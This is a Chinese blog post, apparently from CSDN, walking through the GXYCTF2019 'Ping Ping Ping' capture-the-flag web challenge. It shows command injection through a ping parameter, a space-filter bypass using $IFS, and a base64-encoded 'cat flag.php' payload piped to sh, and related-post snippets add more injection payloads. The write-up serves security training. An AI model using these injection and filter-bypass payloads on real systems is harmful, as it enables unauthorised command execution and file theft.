[GXYCTF2019] web题-Ping Ping Ping

最新推荐文章于 2024-07-09 11:00:18 发布
最新推荐文章于 2024-07-09 11:00:18 发布
阅读量633 收藏
点赞数 1
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107186384
版权
该博客介绍了GXYCTF2019中的一道web题目——Ping Ping Ping。博主通过复现环境在buuoj.cn上进行挑战,发现题目涉及命令执行。由于空格被过滤,博主利用$IFS$1代替空格,并且绕过flag.php的读取限制,通过cat命令的base64编码形式(Y2F0IGZsYWcucGhw)读取了index.php。文章提到此题还有其他解法,但作者仅分享了自己的方法。
摘要由CSDN通过智能技术生成

复现环境:buuoj.cn
开题发现是命令执行的题
在这里插入图片描述在这里插入图片描述
ls查看下
在这里插入图片描述
使用cat发现空格被过滤了,这里用$IFS$1来代替空格,读取flag.php也被过滤了,这里读取index.php
在这里插入图片描述

根据过滤来构建payload
Y2F0IGZsYWcucGhw 是cat flag.php的base64编码

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

在这里插入图片描述
我只做了这个解法,但这题还有其他的解法。

BROTHERYY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
[GXYCTF2019]Ping Ping Ping
怪味巧克力的博客
07-12 524
0x01 拿到目进入如下: 需要加上变量 到这里其实就已经很明确考点是什么了,就是考察的命令执行中的绕过 先试试命令 发现ls命令可以执行,输出结果为flag.php和index.php 0x02 发现了两个文件,试着读取一下 发现空格被过滤,绕过空格的方法(仅使用于linux系统) $IFS ${IFS} $IFS$数字 < <> {cat,flag.php} 经过尝试,发现第三个可以绕过空格,结果如下,这是我们查看index.php的结果 |\'|\"|\\|
[GXYCTF2019]Ping Ping Ping纪要
最新发布
qq_37079022的博客
07-09 132
绕过后出现新的报错 flag被拦截那就换个文件 换index.php。能访问 那就存在命令执行加上一个ls 看看都有什么文件。也可以用*替换 如cat fl*.php但是被过滤了。重点2 如何绕过字母使用其他字母赋值 然后用$引用。使用<、<>、$IFS$1 (内部字段分隔符)看到了flag.php cat一下就成功了。ip=那就评一个ip。重点1 linux中空格的过滤如何绕过。字母,无论它们之间有多少其他字符。源码中出现 此行内容将检查。
BUUCTF WEB INCLUDE &&Ping Ping Ping
m0_46315342的博客
08-20 787
BUUCTF WEB INCLUDE 进去之后看到的是这样的,然后点击链接, 在这里试一下php伪协议,构造URL为 http://1ec44303-73b4-47c1-b74e-764c7f147d6f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php 得到 拿去解压之后可以达到: <?php echo "Can you find out the flag?"; //flag{672214de-
BUUCTF Web [GXYCTF2019]Ping Ping Ping & [极客大挑战 2019]LoveSQL & [极客大挑战 2019]Knife & [极客大挑战 2019]Http
网安小趴菜
08-29 336
[GXYCTF2019]Ping Ping Ping,[极客大挑战 2019]LoveSQL,[极客大挑战 2019]Knife,[极客大挑战 2019]Http
经典ctf ping目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 1549
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
window下可用的arp-ping工具
01-03
ARP-Ping工具在Windows操作系统中的应用 在计算机网络中,ARP(Address Resolution Protocol,地址解析协议)是一个重要的底层协议,用于将IP地址映射到物理MAC地址,以便数据能够在网络中正确传输。ARP-Ping是一种...
http-ping工具
12-03
-h header-line Pass the given header line as-is in each ping request. For example, add a host header like this: -h \"Host: www.site1.com\" Be sure to surround the header-line with quotes. You can ...
node-net-ping:网平
06-15
该模块实现了对ICMP Echo (ping) 支持。 此模块使用: npm install net-ping 它使用require()函数加载: var ping = require ("net-ping"); 然后可以创建一个 ping 会话来 ping 或跟踪到许多主机的路由: var...
python-ping:python ping
05-03
Python平使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] hostpositional arguments: host Target hostoptional arguments: -h, --help ...
BUUCTF__[GXYCTF2019]Ping Ping Ping_
风过江南乱的博客
06-25 3088
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这有点东西,不算太水。只是对我来说。 读 目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 701
目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
BUUCTF-MISC-[GXYCTF2019]SXMgdGhpcyBiYXNlPw==~zip
七堇年的博客
12-25 3321
BUUCTF-MISC-[GXYCTF2019]SXMgdGhpcyBiYXNlPw==~zip
BUUCTF - web - PingPingPing+Knife+Http
1tachi的博客
11-02 327
文章目录前言PingPingPing分析构造payload其他方法白给的shellHttpRepeater 前言 已经坚持了半个月了,有十多天一直在写杂项,直到学长委婉地告诉我杂项没啥技术性,就流量分析有点用,建议我学pwn,所以这几天我开始做web了 我会一直坚持下去 加油! PingPingPing 分析 想到昨天做了一个ping加Linux命令,今天这个也可以试试 ?ip=127.0.0.1|ls 尝试拿flag?ip=127.0.0.1|cat flag.php 看来空格被禁了,尝试绕过 换
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 474
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么
日常练习之web(Ping Ping Ping)
doraemon12345的博客
11-26 1043
打开目是/?ip= 猜测应该是命令执行,先试一下?ip=127.0.0.1;cat flag 发现过滤了空格,尝试?ip=127.0.0.1;ls 发现flag.php,绕过空格 /?ip=127.0.0.1;cat$IFS$9flag.php flag被过滤了,换一种方法先看看index.php /?ip=127.0.0.1;cat$IFS$9index.php 发现bash也没了,不过可以用sh来执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh Y2F0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值